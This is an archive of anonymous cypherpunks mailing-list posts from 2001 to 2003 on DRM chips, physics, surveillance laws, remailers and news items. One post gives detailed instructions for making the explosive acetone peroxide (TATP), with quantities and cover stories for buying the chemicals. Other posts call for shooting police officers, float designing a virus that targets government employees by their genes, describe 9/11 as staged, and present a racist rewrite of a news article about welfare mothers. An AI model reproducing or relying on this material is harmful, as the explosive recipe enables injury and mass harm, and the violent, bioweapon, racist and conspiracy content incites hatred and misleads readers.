I think you may have been mislead by the slant of paper.

Quoting from the paper:

http://www.research.ibm.com/gsal/tcpa/why_tcpa.pdf

you will see:

| The TCPA chip is not particularly suited to DRM. While it does have
| the ability to report signed PCR information, and this information
| could be used to prevent playback unless a trusted operating system
| and application were in use, this type of scheme would be a
| nightmare for content providers to manage. Any change to the BIOS,
| the operating system, or the application would change the reported
| values. How could content providers recognize which reported PCR
| values were good, given the myriad platforms, operating system
| versions, and frequent software patches?

which clearly admits that the IBM TPM does implement the full set of
TCPA functionality as specified in the openly published TCPA spec, and
for the purposes of our discussion specifically as you see it does
implement the remote attestation feature.

(Though the author makes some unimaginative claims that it is not
suited for DRM because of upgrades may make that difficult to manage.
Any sane software architecture built on top of this tech can easily
tackle that problem.)

 That's why IBM wants the TPM != TCPA to be loud and clear.  That's
 why the RIAA can't expect it to solve their problem.

I'd think the more likely reason they want to downplay that TCPA is a
DRM enabling technology is because it's bad publicity for a hardware
manufacturer.




Re: Pigs Kill Family Pet

2003-01-10 Thread Anonymous via the Cypherpunks Tonga Remailer
On 9 Jan 2003, lcs Mixmaster Remailer wrote:

 On Thu, 9 Jan 2003 12:35:38 -0500, you wrote:
 
  No they don't; or they wouldn't have had the balls to stop the car in 
  the first place.

 Most cops in Cookeville, TN have dogs. I wonder if they would
 mind them being shotgunned to death. If the dog presents a
 threat of any type like running up wagging its tail like it did
 on the cop's video it is procedure to shoot them. If it's good
 enough for passing motorists pets it's sure good enough for
 cop's dogs seems to me. You just can't allow that threat to go
 unstopped you know? Buck shot is best according to the cops.

Ick. Shooting a dog because it is wagging its tail is not justified, no 
matter what the cops do. You can't put a dog down just because of who its 
masters are -- dogs lack the intellectual reasoning capabilities to 
understand that their owners are evil.

Instead, any cop who shows such blatant disrespect for life and property
as the Tennessee cops in question should himself be shot in the face with
a shotgun, and left on the side of the road to rot.




Re: Pigs Kill Family Pet

2003-01-09 Thread Anonymous via the Cypherpunks Tonga Remailer
On 9 Jan 2003, lcs Mixmaster Remailer wrote:

 On Thu, 9 Jan 2003 12:35:38 -0500, you wrote:
 
  No they don't; or they wouldn't have had the balls to stop the car in 
  the first place.

 Most cops in Cookeville, TN have dogs. I wonder if they would
 mind them being shotgunned to death. If the dog presents a
 threat of any type like running up wagging its tail like it did
 on the cop's video it is procedure to shoot them. If it's good
 enough for passing motorists pets it's sure good enough for
 cop's dogs seems to me. You just can't allow that threat to go
 unstopped you know? Buck shot is best according to the cops.

Ick. Shooting a dog because it is wagging its tail is not justified, no 
matter what the cops do. You can't put a dog down just because of who its 
masters are -- dogs lack the intellectual reasoning capabilities to 
understand that their owners are evil.

Instead, any cop who shows such blatant disrespect for life and property
as the Tennessee cops in question should himself be shot in the face with
a shotgun, and left on the side of the road to rot.




QM, A-B, and the Z

2003-01-03 Thread Anonymous via the Cypherpunks Tonga Remailer
Jim Choate wrote...

Burrowing into what I claimed is 'wacky crapola' I discovered a nugget of truth I can 
agree with (but it'll take a minute to get there...)




And no, Relativity and QM have -not- been joined into a -single cohesive theory-.

You have to qualify this. General relativity has not been unified with quantum 
mechanics in any way that is universally accepted yet, but the superstring and 
M-Theory cats may be closing in.

Special relativity is of course a completely diferent story. Much pof modern QM would 
be impossible without it, and relativistic considerations are a mundane part of 
high-energy particle and accelerator work.





What I -am- saying is that in this specific issue (ie behavior of
entangled photons -or- two slip experiments) the 'problem' of instant
state changes over distance doesn't actually happen. The reason being that the state 
changes are -not- taking place in -our time-space framework- but the -photons-. These 
two time-space frameworks are -not- the same.

Well, I might be willing to agree with you...kind of. The little intuition I've been 
able to build up about EPR is that the uncollapsed wavefuction for the correlated 
photons isn't aware of 'distance' or other measurement parameters. Distance and time 
are only encountered during the measurement process, and only then is there 'two 
photons'...kind of a physical kenosis.




Whaledreck. How does the electron interact with -any- EM field (ie
voltage)? Via an 'intermediate vector boson', that's how. What is that
particle? A -photon-. How much difference in distance or time is there
-from the perspective of the photon- between the electron and the shielded field? 
Answer, none. The reality is that the 'shield' is -only- a shield in our frame of 
reference, it's nothing from the photons...

Double whaledreck (I actually never heard that phrase before...)

First of all, an intermediate vector boson is not even remotely a photon, but I doubt 
that's germane to the argument. (But physicists do not invoke Z-particles to explain 
this kind of interaction. In fact, right now there is no particle-based explaination 
for this interchange.)

Second (and this does matter, from what I'm reading into your writing), A-B uses an 
electron beam that is split, and the upper and lower halfs of this beam made to 
reconverge on the other side of a toroidal-protected hole. In that hole is a voltage, 
and A-B easily predicts that the relative phase of the electrons as they recoverge 
will be different, and the magnitude of the phase change is directly proportional to 
the voltage in the hole, that they are completely 'unaware' of in the classical sense.

The point for me here is that one can not extend classical thinking to account for 
this. (In fact, its very hard to extend common sense to understand this.) How do the 
electrons 'see' that voltage? Through what mechanism? According to quantum theory, it 
clearly appears that (like in EPR) they are aware of that field without interacting 
with it at all. There's no particle exchange.



It isn't a problem of physics, it's a problem of imagination.

Well, that's basically MY point. QM seems to be telling us something about reali9ty, 
but we can't imagine what it is (David Duetch and a few others have tried). We don't 
have a picture yet ot go with our data and theories.

But if I have time, I'll repost about why a 'Cypherpunk' (of any stripe, not just 
CACL...is that still a Cypherpunk?)...cares, or should. (Well, kinda...)




Re: Policing Bioterror Research

2002-12-23 Thread Anonymous via the Cypherpunks Tonga Remailer
The main question is - is 1984-type society stable ?

All this lamenting about hamstringed sheeple and fascist state does no good if it 
cannot motivate some effective resistance.

My take is that via decimation of the middle class, successful subverting of the 
education system and development of the best propaganda machinery in the known 
history, the grounds are ready for a long-term stable totalitarian state.

The WTC theatre was a masterpiece. I don't know if USG directly, indirectly or via 
simple negligence sponsored that event - but I am positive that the mythology of 
government is too dumb to do anything intelligent is outright wrong. They are not 
dumb. The WTC was used with extreme efficiency - I don't think that they missed any 
aspect of capitalizing on it.

So, what can be done to blow the brains of the fascist state?

The small, or better negligible number of intellectuals and desperadoes of various 
kinds (from cypherpunks to militias) are not going to do it. Not enough discomfort, 
balls and guns.

Foreign opponents ? Unlikely. Europe has no military to speak of, and 60,000 US troops 
in wiesbaden have tight control of the nuclear arsenal. The only semi-independent 
power is France. Russia ? It's still trying to stop the slide into the third world.

So that leaves us with china, and it seems that chinese are in a mood for having two 
cooperating fascist governments rather than war.

Who then ?

I see the only hope in some unforeseen development, most likely technological, that 
would disrupt the mechanics of the empire faster than the empire can coopt it. This 
has happened in the fast. Gutenberg's press effectively destroyed the church's power.

I think that this is the main reason behind massive clampdown on research of any kind. 
The empire knows that runaway knowledge and intelligence can kill it - therefore it 
will ban it.

This is not about bioweapons or something known. This is the drive to achieve the 
monopoly on the knowledge and ensure the longevity of the empire. Empire knows very 
well that if someone, in some garage, invents a zap gun, that may be the end of it. 
And this regularly happened in the history.

So, read books, do experiments and teach others the same. Don't forget to play good 
consumers during the day - you don't want to get on the List. We will know when 
someone invents the Zap Gun. You'll see heads exploding on live TV.




Re: Policing Bioterror Research

2002-12-22 Thread Anonymous via the Cypherpunks Tonga Remailer
The main question is - is 1984-type society stable ?

All this lamenting about hamstringed sheeple and fascist state does no good if it 
cannot motivate some effective resistance.

My take is that via decimation of the middle class, successful subverting of the 
education system and development of the best propaganda machinery in the known 
history, the grounds are ready for a long-term stable totalitarian state.

The WTC theatre was a masterpiece. I don't know if USG directly, indirectly or via 
simple negligence sponsored that event - but I am positive that the mythology of 
government is too dumb to do anything intelligent is outright wrong. They are not 
dumb. The WTC was used with extreme efficiency - I don't think that they missed any 
aspect of capitalizing on it.

So, what can be done to blow the brains of the fascist state?

The small, or better negligible number of intellectuals and desperadoes of various 
kinds (from cypherpunks to militias) are not going to do it. Not enough discomfort, 
balls and guns.

Foreign opponents ? Unlikely. Europe has no military to speak of, and 60,000 US troops 
in wiesbaden have tight control of the nuclear arsenal. The only semi-independent 
power is France. Russia ? It's still trying to stop the slide into the third world.

So that leaves us with china, and it seems that chinese are in a mood for having two 
cooperating fascist governments rather than war.

Who then ?

I see the only hope in some unforeseen development, most likely technological, that 
would disrupt the mechanics of the empire faster than the empire can coopt it. This 
has happened in the fast. Gutenberg's press effectively destroyed the church's power.

I think that this is the main reason behind massive clampdown on research of any kind. 
The empire knows that runaway knowledge and intelligence can kill it - therefore it 
will ban it.

This is not about bioweapons or something known. This is the drive to achieve the 
monopoly on the knowledge and ensure the longevity of the empire. Empire knows very 
well that if someone, in some garage, invents a zap gun, that may be the end of it. 
And this regularly happened in the history.

So, read books, do experiments and teach others the same. Don't forget to play good 
consumers during the day - you don't want to get on the List. We will know when 
someone invents the Zap Gun. You'll see heads exploding on live TV.




Re: [IP] The TIA and fighting terrorism

2002-12-13 Thread Anonymous via the Cypherpunks Tonga Remailer
And this from a 1987 post:

Current online database vendors like Dialog and Mead Data 
Central are already foreshadowings (albeit extremely primitive) 
of a GHA. It is interesting to recall that under the reign of 
John Poindexter, of Irangate fame, the NSC was seeking to gain 
legal access to the records of these companies, which store 
sensitive information about the search targets and patterns of 
their users. As I recall, the NSC was denied legal access by 
Congress, but then there is always the problem of illegal 
access, which is relatively trivial to accomplish wholesale by 
intercepting telecommunications.

see google...




Re: [IP] The TIA and fighting terrorism

2002-12-13 Thread Anonymous via the Cypherpunks Tonga Remailer
And this from a 1987 post:

Current online database vendors like Dialog and Mead Data 
Central are already foreshadowings (albeit extremely primitive) 
of a GHA. It is interesting to recall that under the reign of 
John Poindexter, of Irangate fame, the NSC was seeking to gain 
legal access to the records of these companies, which store 
sensitive information about the search targets and patterns of 
their users. As I recall, the NSC was denied legal access by 
Congress, but then there is always the problem of illegal 
access, which is relatively trivial to accomplish wholesale by 
intercepting telecommunications.

see google...




A non-political issue

2002-10-29 Thread Anonymous via the Cypherpunks Tonga Remailer
(possible duplicate message)

What technology is available to create a 2048-bit RSA key pair so that:

1 - the randomness comes from quantum noise

2 - no one knows the secret part,

3 - The secret part is kept in the box and it is safe as long as the box is 
physically secured (expense of securing the box is a don't care).

4 - box can do high-speed signing (say, 0.1 mS per signature) over some kind of 
network interface

5 - you can reasonably convince certain people (that stand to lose a lot and have huge 
resources) in 1, 2, 3 and 4.

6 - The operation budget is around $1m (maintenance not included).

7 - attacker's budget is around $100m

8 - the key must never be destroyed, so backup is essential.

In other words, convincing translation of a crypto problem into physical security 
problem.


It looks like the key gets created on the same box(es) on which it is stored, which 
all interested parties inspected to any desireable level. Once everyone is comfortable 
the button gets pressed to create/distribute the key, and then you put goons with AKs 
around the boxes and pray that no one fucked with the microprocessor ... this may mean 
buying the components at random.




Re: Another restriction on technology - cell and cordless scanning now felony

2002-07-17 Thread Anonymous via the Cypherpunks Tonga Remailer

On Tue, 16 Jul 2002 15:15:31 -0400, you wrote:
   Thus the legal climate has fundamentally changed, and one can
 assume that since the Bush administration has been pushing for the
 passage of this bill that they perhaps intend to start prosecuting at
 least some category of radio  under the new provisions - no
 doubt as an example meant to scare the rest of us into handing our
 radios in at the nearest police station...

Shouldn't we turn in our guns first? Or is it our books? Maybe it would be smart to 
get rid of any 
compilers, don't you think?

We have a national secret police now that no longer has to start with a crime and then 
find a 
criminal, rather they can start with a person and find a way to classify him a 
criminal. Radio 
frequencies just give them one more way to put a person in jail for five years. It is 
actually 
nice of them to not just suspend habeas corpus universally.




Re: Another restriction on technology - cell and cordless scanning now felony

2002-07-16 Thread Anonymous via the Cypherpunks Tonga Remailer

On Tue, 16 Jul 2002 15:15:31 -0400, you wrote:
   Thus the legal climate has fundamentally changed, and one can
 assume that since the Bush administration has been pushing for the
 passage of this bill that they perhaps intend to start prosecuting at
 least some category of radio  under the new provisions - no
 doubt as an example meant to scare the rest of us into handing our
 radios in at the nearest police station...

Shouldn't we turn in our guns first? Or is it our books? Maybe it would be smart to 
get rid of any 
compilers, don't you think?

We have a national secret police now that no longer has to start with a crime and then 
find a 
criminal, rather they can start with a person and find a way to classify him a 
criminal. Radio 
frequencies just give them one more way to put a person in jail for five years. It is 
actually 
nice of them to not just suspend habeas corpus universally.




From the recent past of Homeland defense

2002-06-13 Thread Anonymous via the Cypherpunks Tonga Remailer

http://news.bbc.co.uk/hi/english/sci/tech/newsid_2033000/2033324.stm


A new book reveals the 22-year effort by FBI director J Edgar Hoover to get Albert 
Einstein arrested as a political subversive or even a Soviet spy.

Uncovered FBI files are revealed in a book by Fred Jerome who says it was a clash of 
cultures - Einstein's challenge and change with Hoover's order and obedience.

From the time Einstein arrived in the US in 1933 to the time of his death, in 1955, 
the FBI files reveal that his phone was tapped, his mail was opened and even his 
trash searched. 


(if only they had Osama)




From the recent past of Homeland defense

2002-06-12 Thread Anonymous via the Cypherpunks Tonga Remailer

http://news.bbc.co.uk/hi/english/sci/tech/newsid_2033000/2033324.stm


A new book reveals the 22-year effort by FBI director J Edgar Hoover to get Albert 
Einstein arrested as a political subversive or even a Soviet spy.

Uncovered FBI files are revealed in a book by Fred Jerome who says it was a clash of 
cultures - Einstein's challenge and change with Hoover's order and obedience.

From the time Einstein arrived in the US in 1933 to the time of his death, in 1955, 
the FBI files reveal that his phone was tapped, his mail was opened and even his 
trash searched. 


(if only they had Osama)




We will hit all those weaker than us, says Bush

2002-06-02 Thread Anonymous via the Cypherpunks Tonga Remailer

War on terrorism to be pre-emptive, says Bush

WEST POINT, New York: Amid speculation that the United States may attack on Iraq, US 
President George W Bush warned on Saturday that his war on terrorism might often 
require pre-emptive military action.

Our security will require all Americans to be forward-looking and resolute, to be 
ready for pre-emptive action, when necessary, to defend our liberty and to defend our 
lives, he said in a speech at this storied military school.


http://jang.com.pk/thenews/jun2002-daily/02-06-2002/main/main7.htm




We will hit all those weaker than us, says Bush

2002-06-01 Thread Anonymous via the Cypherpunks Tonga Remailer

War on terrorism to be pre-emptive, says Bush

WEST POINT, New York: Amid speculation that the United States may attack on Iraq, US 
President George W Bush warned on Saturday that his war on terrorism might often 
require pre-emptive military action.

Our security will require all Americans to be forward-looking and resolute, to be 
ready for pre-emptive action, when necessary, to defend our liberty and to defend our 
lives, he said in a speech at this storied military school.


http://jang.com.pk/thenews/jun2002-daily/02-06-2002/main/main7.htm




Re: Bad guys vs. Good guys

2002-05-13 Thread Anonymous via the Cypherpunks Tonga Remailer

I used a VISA debit card to buy a $25,000 Ford Explorer.

You mentioned this for the fourth time this month.

It would be refreshing if you could name some other merchandise next time, maybe some 
non-redneck items ?




CodeCon recap from The Register

2002-02-26 Thread Anonymous via the Cypherpunks Tonga Remailer

Andrew Orlowski on CodeCon, the cutting-edge technology conference 
produced by Bay Area Cypherpunks Bram Cohen and Len Sassaman.

Andrew seems to like the heavy emphasis on working code (even without 
working demos!) and the lack of comp'd journalists.


quote
Probably what made this grassroots conference so enthralling was the 
absence of people who talk about stuff, and an abundance of people who do 
stuff . This is in marked contrast to the O'Reilly P2P conference exactly 
a year ago, which no self-respecting blog giant (hi Dave!) or media pundit 
could afford to miss. Such folk were conspicuous by their absence at 
CodeCon. On the other hand, we did get to hang out with Captain Crunch, 
which was a treat beyond compare.

Instead, there were precisely three hacks in consistent attendance. 
Annalee Newitz, who writes the terrific Techsploitation column for the Bay 
Guardian and the San Jose Metro; Danny O'Brien, whose natty precis of the 
event tops this week's NTK , and your own humble scribe. So if you were 
one of the creme de la creme of cryptographers present, you had no fear of 
Declan creeping up behind you to take your picture. Phew! 

[...]

Although the organizers promised only working-demos, most of the demos 
didn't um, actually work. Most nearly worked, and in some cases were 
compiling before our very eyes - an authenticity trip that's hard to beat 
- but that didn't make them any less engaging. 

[...]

The bit where Eric Hughes confesses to posting the RC4 code anonymously 
onto the cypherpunks list back in 1995 takes place nine hours in.

The most rock and roll event, the details of Peek-A-Booty, takes place 
an hour later.

Neglected but no less intriguing, is the Invisible IRC Project by 0x90. 
He's got a stream of the session itself, a 5MB download  here . IIP has a 
three-tier approach, and looks and smells like an IRC network but has a 
fundamentally different approach: it rotates the keys constantly. 0x90 
reckons it can be used to do anything. 

[...]

The other show-stopper is Jonathan Moore's ad-hoc 802.11 network project, 
Wiki Wiki Wan . Now the benefits of such spontaneous wireless networks are 
obvious, but hacking one together isn't easy, as it runs counter to how 
networks are put together. Did you say packet collision?

[...]

The bones of Mojo live on, in Zooko's MNET project, an hour into the 
stream, and the BitTorrent  project. Of course BitTorrent shouldn't exist: 
we should all be using multicast IP by now, right? But we aren't, and 
BitTorrent is a neat hack to distribute one to many file shares over 
today's IP.

/quote

[...]

http://www.theregister.co.uk/content/55/24183.html




[Reformatted] FLA zoning laws don't apply to net

2002-02-26 Thread Anonymous via the Cypherpunks Tonga Remailer

[EMAIL PROTECTED] (Khoder bin Hakkin) writes:

 http://story.news.yahoo.com/news?tmpl=storycid=73u=/zd/20020226/tc_zd/5103755
 
 Voyeurdorm sees major court win
 Tue Feb 26, 2:43 PM ET
 By Lisa M. Bowman, ZDNet News

 The U.S. Supreme Court (news - web sites) said Monday it will not hear
 a case involving an attempt to shut down an adult Web site by the city
 of Tampa, Fla.

 The city had tried to shut down exhibitionist site Voyeurdorm.com,
 which provides 24-hour live Webcasts of a residence full of women
 while they study, work out, bathe and live the lives of college
 co-eds. The city said the Tampa residence violated city zoning
 ordinances regulating the location of sexually oriented businesses.

 It's the second time a court has refused to consider the issue, paving
 the way for the Voyeurdorm to remain open for business. In November,
 the 11th U.S. Circuit Court of Appeals (news - web sites) refused to
 grant a full-court hearing of the case.

 The city had asked for the full court review after a three-judge panel
 of the court ruled that city ordinances do not apply to the Web site,
 which operates primarily in cyberspace.

 Entertainment Network (ENI), which runs Voyeurdorm and other
 exhibitionist sites, praised the Supreme Court's move.

 This is a victory for anyone operating a legitimate Internet site,
 whether or not it has adult content, ENI Chief Executive David
 Marshlack said in a statement. It is obvious that the Internet should
 not be regulated under zoning laws written long before the Web was
 even dreamed of.

 ENI was also in federal court last year during an unsuccessful attempt
 to get permission to Webcast the execution of Oklahoma City bomber
 Timothy McVeigh (news - web sites).

 Tampa officials said a lower court may still issue a ruling on other
 parts of the case.

 The Court's determination not to hear this case does not mean the
 case is over, said Assistant City Attorney Jerry Gewirtz. Gewirtz
 said the city will abide by any court rulings.




[Reformatted] Brinworld: inet cam to watch surfer turf wars

2002-02-25 Thread Anonymous via the Cypherpunks Tonga Remailer

[EMAIL PROTECTED] (Major Variola ret) writes:

 Police Step Up Coastal Patrols

 Browne, a police chief who surfs, said he understands everybody has a
 right to get to the ocean. He has increased uniformed patrols along
 a stretch of coast that includes popular surf spots such as The Cove,
 Haggerty's, Indicator and Lunada Bay.

 Browne also has been running undercover stings to nab car vandals. He
 even mounted an Internet camera with a powerful zoom lens atop his
 house, city-owned property with a bird's-eye view of the surfing beach
 where Banas tangled with the locals.

 The surf cam allows Internet viewers to watch the waves, or any
 mischief taking place on the beach, at www.surfline.com. Police hope
 the camera will act as a crime deterrent, much like a video camera in
 a convenience store.

 
http://latimes.com/news/local/la-14142feb24.story?coll=la%2Dheadlines%2Dcalifornia




Re: Hacker threat looms for mobile handsets

2002-02-25 Thread Anonymous via the Cypherpunks Tonga Remailer

Mischief that has caused cell phones to go haywire in Europe and Japan could be just 
the beginning.
The hacker underground has ordered a hit on the mobile phone platform, industry 
leaders

It's neat that industry leaders, whoever the thugs may be, follow bush
fashion and stuff hackers with terrorists and Cypherpunk Movement, those that
circulate orders as bin laden in stegoed jpegs, but this is not really
effective.

Huge money looted by privatizing ether is the thing of the past. As with
microsoft, all attempts to concentrate technology so that everyone pays to
one monopoly lead to increasing costs of attacks. This is the price that
economics of mass market have to pay. This makes economics of scale unviable.
Making a lot of the same creates vulnerabilities. Current attempts to cure
this by making thinking/programming illegal are bound to fail.

The only security, after all, can prove to be security through obscurity, where
every town has its own, unique, cell phone technology and frequencies and modulation,
and attacking each will mean learning each one first. Of course that it will be
expensive, and I think it's good. Pipe dreams of selling globally are over.

Brain cycles are the only truly limited resource.




Re: spam attack on cpunks list

2002-02-05 Thread Anonymous via the Cypherpunks Tonga Remailer

[1] this isn't true of the other lists that I run some of which have
been around for many years, and get very little spam.  I think that
it's pretty obvious that one or more people are luring spam to cpunks
in order to discourage the discussions that happen here.

This has been obvious for months - I'd say 5-6 months. Running a correlation test 
against new fed agencies or employees may narrow the circle of possible culprits.

I wonder, what is it like to get paid by the government to spam. I have seen some 
professional commercial spammers - that's generally the predatory species with no 
regard for other's comfort. Things no one would hesitate to terminate (provided 
reasonable escape route.) Now, doing this not for the self interest but for the 
government reminds me of the psychopath thread.

Could it be that there is a subspecies genetically adapted to work for the government 
? There is a very strong evolutionary pressure here - they would get more chance to 
procreate than their victims.

Which brings me to the point: is it possible to design an ebola-like virus that would 
specifically target this particular gene fingerprint ?




[Reformatted] Charges Against Egyptian Student Over Hotel Radio Are Dr

2002-01-18 Thread Anonymous via the Cypherpunks Tonga Remailer

[EMAIL PROTECTED] writes:

 January 17, 2002
 Charges Against Egyptian Student Over Hotel Radio Are Dropped
 By THE ASSOCIATED PRESS
 Filed at 8:08 p.m. ET
 
 NEW YORK (AP) -- Shouting ``nothing tops freedom,'' an Egyptian
 student forgave the FBI on Thursday for throwing him in jail after an
 aviation radio was found in his hotel room near the World Trade Center
 on Sept. 11.

 Abdallah Higazy, 30, was released late Wednesday after a month in
 detention because another hotel guest -- a private pilot -- told
 officials the radio was his.

 ``To be absolutely honest, I don't blame the FBI for thinking it was
 mine,'' Higazy said. He offered to take two agents who interrogated
 him to dinner so everyone could ``bury the hatchet.''

 -
 Yeah, I'd bury the hatchet... in the back of their heads.




Buddy is Vince Foster'ed

2002-01-03 Thread Anonymous via the Cypherpunks Tonga Remailer

http://ap.tbo.com/ap/breaking/MGA1U5EL0WC.html




Paris cops raid cybercafes

2002-01-01 Thread Anonymous via the Cypherpunks Tonga Remailer

Anti-welfare mother suit gets a major victory
Public nuisance laws may apply, appeals court says

By Robert Beecker and Christy Parsons
Tribune staff reporters
Published January 1, 2002

In a significant victory for birth-control advocates, the Illinois Appellate Court
ruled Monday that welfare mothers can be sued on the grounds
that their spawn create a public nuisance.

Marking the first time an Illinois appeals court has considered the novel legal 
strategy, the decision
allows the family of slain Chicago Police Officer Michael Ceriale and relatives of two 
others killed in
urban negro violence to press their claim in Cook County Circuit Court that welfare 
mothers 
have nurtured a climate of violence by flooding Chicago and its suburbs with ill 
raised offspring.

Writing for the three-member panel, Appellate
Judge William Cousins Jr. ruled: In our view, a
reasonable trier of fact could find that the indiscrimate
breeding of violent persons were occurrences
that defendants knew would result or were
substantially certain to result from the defendants'
alleged conduct.

The decision represents the biggest win to date for
birth-control advocates in their drive to use public
nuisance laws to hold welfare mothers accountable,
legal experts say.

Of more than 30 such suits filed around the
country, this is the first case to win a favorable
appellate decision, said David Kairys, the Temple
University law professor who came up with the
legal strategy.

This is really a very strong vindication of the strategy, Kairys said. The way the 
mothers are
endangering the public health and safety is that they are knowingly and intentionally 
supplying the
criminal gangs with members. It's really that simple.

In addition to allowing the Ceriale case to proceed, the Appellate Court's decision 
could also influence
a similar suit brought by the City of Chicago, which is pending before the same panel. 
The city's suit,
which also raised nuisance issues, was dismissed in September 2000 by a Cook County 
judge.

Lawyers for the city said Monday that the appellate decision in the Ceriale 
case--while not
binding--gives every indication that the lawsuit will be reinstated.

In addition to the Ceriale family, plaintiffs in the case pending before Cook County 
Circuit Judge
Jennifer Duncan-Brice include the family of Andrew Young, who was murdered in June 
1996 in his car
at a stoplight at Clark and Howard Streets.

Defendants in the suit include a number of welfare-rights activists.

Attorneys representing welfare mothers said Monday they had not seen the Appellate 
Court's
decision.

But James Dorr, attorney for two welfare mothers, said: I'm sure we'll consider 
appealing the decision to
the Illinois Supreme Court.

NAACP reaction

Todd Vandermyde, Illinois lobbyist for the NAACP, said welfare opponents are trying to
get from the court what they've been unable to get out of the legislature.

They don't like parasites, they don't like gangs, they don't like people who breed 
irresponsibly. So they'll do
what they can to run them out of town, Vandermyde said.

Attorneys for the families that brought the case praised the court's decision as 
sensible and
courageous.

What the court did is apply time-honored principles of public nuisance law to the 
situation we have in
Chicago, said Locke Bowman, legal director for the MacArthur Justice Center at the 
University of
Chicago.

Lawsuits against the welfare industry have cast a new light on the doctrine of public 
nuisance, the area of
law that lets officials put a stop to activities that pose a danger to the public. In 
more traditional cases,
cities have used such laws to put a clamp on unlawful use of fireworks or industries 
belching smoke.

In recent years, though, Chicago and dozens of other municipalities have tried to use 
the law to pursue
gangster breeders, alleging that they, too, violate reasonable rights to safety. With 
Monday's opinion,
the private plaintiffs cleared the first hurdle to applying that law to a new set of 
facts.

Filed in 1998, the lawsuit stems from the gun-related deaths of five young people, 
including rookie
Police Officer Ceriale, 26, who was killed in August 1998 while conducting 
surveillance of a drug
operation at the Robert Taylor Homes.

The lawsuit accused the defendants of supplying a vast, illicit underground market in 
bodies in order
to meet the demand for gang members and juveniles.

Attorneys for the families alleged that the design, marketing and distribution of the 
welfare system combined
to create a situation where it was highly likely that criminal youths would flow into 
the underground market.

Attorneys for the welfare mothers have countered that their clients manufacture and 
distribute a legal
product.

snip 
http://chicagotribune.com/news/nationworld/chi-0201010192jan01.story?coll=chi%2Dnews%2Dhed
 




Fun with bleach and nail polish remover

2001-12-29 Thread Anonymous via the Cypherpunks Tonga Remailer

However, it may be impossible to prevent the publication of all information concerning 
the
 making and use of explosives. The problem of easy availability of information on 
how to make improvised explosive
 devices is compounded by the ease with which anyone can also obtain the necessary 
materials to make a bomb.
 Improvised explosive devices can be manufactured from such common chemicals as 
acetone (fingernail polish remover),
 peroxide (hair bleach), and one additional readily available ingredient. For 
example, Triacetone Triperoxide (TATP), a
 combination of these ingredients, is currently the most common explosive used by 
terrorists in Israel.


I have seen too many dangerous mistakes in this NG when AP is being discussed. I 
will rather give you the correct details that
you make it and do not blow off your hands. 

You will need 30% Hydrogen Peroxide (6% will give you a rather poor yield). Now to get 
the 30% Hydrogen Peroxide, go to
your local hospital chemist. 30% will never be sold to someone for their hair so don't 
try that story, so spin a story that the
Peroxide is to clean a wound as it is a great disinfectant (diluted of course). 

The acetone can be bought at either a hardware store or at a hospital or normal 
chemist. If you get asked why you need the
acetone, spin a story that it is used to thin paint, or to strip paint. Remember that 
acetone is highly flammable. 

The Hydrochloric Acid can be purchased from any swimming pool shop, or from your local 
hardware store. The type that goes
into your pool is normally 31.5% and is perfect for what you need. The Hydrochloric 
acid will give you a trimmer, sulphuric
acid will give you the dimmer version of the AP. 

Now that you have acquired all the ingredients, take a beaker or clean 500 ml bottle 
and place it into some nice cold water.
Into this beaker, add 200 ml hydrogen peroxide (try not to get any of this onto your 
skin). Now add 150 ml of the acetone.
Remember to do this outside as the fumes are rather unpleasant to breath in. You will 
feel the beaker will start to get a bit
warm. Now add 50 ml hydrochloric acid to the mixture and stir with a glass rod. There 
that is all you have to do. 

Do this experiment in the evening and let the AP stand over night. In the morning you 
will see that you will have +- 2.5 cm of
crystals at the bottom of the flask and +- 0.5 cm floating on the top of the flask. 
Take a glass funnel and insert coffee filter
paper or oil filtering paper and filter the AP crystals out. Place these crystals out 
onto a sheet of clean paper and leave them to
dry +- 1/2 a day to a day. Try to keep the crystals out of direct sunlight, preferably 
in a shady area. 

Place these dry crystals into a camera film container. Please do not hit these 
crystals with a hammer as a bright person claimed
to have done, you could land up with that hammer in your forehead. AP is sensitive to 
heat and to friction. When the crystals do
not respond to either friction or impact it simply means that the crystals are still 
too wet. 



WARNING: Acetone Peroxide is dangerous and very sensitive to FRICTION,
SHOCK, HEAT OR FLAME. Handle with great care!! This 
composition is dangerous
and would need to be handled by someone with a lot of 
common sense. If you do
not have experience with explosives DO NOT MAKE THIS. I 
can not stress
enough how unstable and dangerous acetone peroxide is. 
This explosive is the
most unstable of all other explosives. Making large 
quantities is suicide as the
weight of the crystals will detonate themselves.



   Information on Acetone Peroxide:

   Acetone peroxide is formed when hydrogen peroxide 30% acts on 
acetone. The
   introduction of dilute sulfuric acid causes the reaction to go 
into completion.

   There are actually two isomers of acetone peroxide, the first 
is tricycloacetone
   peroxide and the second is dicycloacetone peroxide. Both of 
these compounds are
   very similar, but the reaction seems to favor the tricyclo over 
the dicyclo. Both will
   be made in the reaction to differing degrees. The trimmer has 
about 80% the power
   of TNT.

   A quantity the size of a pea in contact with a flame will burn 
instantaneously with a
   small 'pop' and producing a fireball, much like HMTD does. Any 
sign of confinement
   will ensure that ignition will rapidly give rise to detonation.

   Acetone peroxide is a powerful primary explosive. It, as with 
other explosive
   peroxides, seems to be very volatile. In standing 10 days at 
room temperature,
   

RE: CNN.com on Remailers

2001-12-19 Thread Anonymous via the Cypherpunks Tonga Remailer

 One solution, which I've long advocated, is for the remailer to drop 
 mail which has an unencrypted body after it's applied it's decryption 
 key.
 
 Provided this is an announced policy, substantially increases the
 protection of the mail and the remop. It does mean that only people
 capable of using encryption can receive mail via the remailer, but   
 that's probably a *good* thing.

No, that is a terrible idea. It totally destroys the usefulness of 
remailers on Usenet and mailing lists.

Make your system so hard to use that no one uses it. That way, no one 
will abuse it!

Pshaw.




[Reformated] slavery in New Jersey

2001-12-06 Thread Anonymous via the Cypherpunks Tonga Remailer

[EMAIL PROTECTED] (Major Variola ret) writes:

 Complete with soccer-mom revolutionaries and obligatory contracts...

 I suppose this is what you get for working for the state, eh?


 
http://latimes.com/news/nationworld/nation/la-97073dec06.story?coll=la%2Dheadlines%2Dnation


 MIDDLETOWN, N.J. -- On Saturday, the Middletown High School South
 Tigers won the state football championship. On Monday, their head
 coach went to jail.

 Coach Steve Antonucci was among 135 striking schoolteachers and
 secretaries behind bars by day's end Wednesday, and the number is
 expected to swell as nearly 900 continue to defy a judge's order to
 get off the picket line and into the classroom.

 The five-day strike and jailings have torn this otherwise average
 American suburban community in two.

 Favorite kindergarten teachers, drama coaches and others who have
 always seen themselves as normal, law-abiding folks are being led
 to jail sobbing or defiantly denouncing the local school board
 and residents. This town ought to be ashamed of itself, said
 Lauren Spatz, a second-grade teacher. The parents don't care about
 education. . . . It's not going to be the same ever again. The
